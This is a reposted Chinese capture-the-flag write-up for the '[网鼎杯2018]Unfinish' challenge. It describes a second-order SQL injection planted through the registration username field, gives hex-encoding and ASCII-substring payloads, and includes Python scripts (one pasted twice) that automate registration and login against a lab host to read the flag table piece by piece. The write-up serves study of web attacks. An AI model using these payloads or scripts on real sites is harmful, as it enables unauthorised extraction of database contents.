[网鼎杯2018]Unfinish

转载

mb5fca0b6a49e47 2021-10-01 14:00:00

文章标签 html php safari python chrome 文章分类 后端开发

[网鼎杯2018]Unfinish

0x01.前言

过滤了,分割时使用from 1 for 10绕过
0'+hex编码要读取的信息+'0

要进行二次编码一次编码会被截断

[网鼎杯2018]Unfinish_safari_02

[网鼎杯2018]Unfinish_chrome_03

[网鼎杯2018]Unfinish_php_04

解法1

payload:0'+(select substr(hex(hex((select * from flag))) from 1 for 10))+'0

脚本

#coding:utf-8
import requests
import re
import time
from bs4 import BeautifulSoup
str=''
headers={
    'User-Agent':"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
    'Referer':"https://www.lagou.com/jobs/list_python/p-city_252?px=default&gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1",
    'Accept':'application/json, text/javascript, */*; q=0.01'
}
url_log= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'
url_reg= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'
for i in range(0,100):
	payload="0'+(select substr(hex(hex((select * from flag))) from {} for 10))+'0".format(1+i*10)	
	#print(payload)
	data_reg ={"email":"11111231{}@qq.com".format(i),"username":payload, "password" : "123"}
	data_log ={"email":"11111231{}@qq.com".format(i),"password" : "123"}
	res1=requests.post(url_reg,headers=headers,data=data_reg)
	time.sleep(1)
	res=requests.post(url_log,headers=headers,data=data_log)
	soup = BeautifulSoup(res.text,'html.parser') 
	print(soup.span.text)
	#str=str+','+soup.span.text
	#print(str)

解法2

payload:0'+ascii(substr((select * from flag) from {} for 1))+'0

脚本

#coding:utf-8
import requests
import re
import time
from bs4 import BeautifulSoup
str=''
headers={
    'User-Agent':"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
    'Referer':"https://www.lagou.com/jobs/list_python/p-city_252?px=default&gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1",
    'Accept':'application/json, text/javascript, */*; q=0.01'
}
url_log= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'
url_reg= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'
for i in range(1,100):
    payload="0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i) 
    #print(payload)
    data_reg ={"email":"111112{}@qq.com".format(i),"username":payload, "password" : "123"}
    data_log ={"email":"111112{}@qq.com".format(i),"password" : "123"}
    res1=requests.post(url_reg,headers=headers,data=data_reg)
    time.sleep(1)
    res=requests.post(url_log,headers=headers,data=data_log)
    soup = BeautifulSoup(res.text,'html.parser') 
    print(soup.span.text)
    str=str+','+soup.span.text
    print(str)
#coding:utf-8
import requests
import re
import time
from bs4 import BeautifulSoup
str=''
headers={
    'User-Agent':"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
    'Referer':"https://www.lagou.com/jobs/list_python/p-city_252?px=default&gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1",
    'Accept':'application/json, text/javascript, */*; q=0.01'
}
url_log= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'
url_reg= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'
for i in range(1,100):
    payload="0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i) 
    #print(payload)
    data_reg ={"email":"111112{}@qq.com".format(i),"username":payload, "password" : "123"}
    data_log ={"email":"111112{}@qq.com".format(i),"password" : "123"}
    res1=requests.post(url_reg,headers=headers,data=data_reg)
    time.sleep(1)
    res=requests.post(url_log,headers=headers,data=data_log)
    soup = BeautifulSoup(res.text,'html.parser') 
    print(soup.span.text)
    str=str+','+soup.span.text
    print(str)

本文章为转载内容，我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题，欢迎原作者联系我们进行内容更正或删除文章。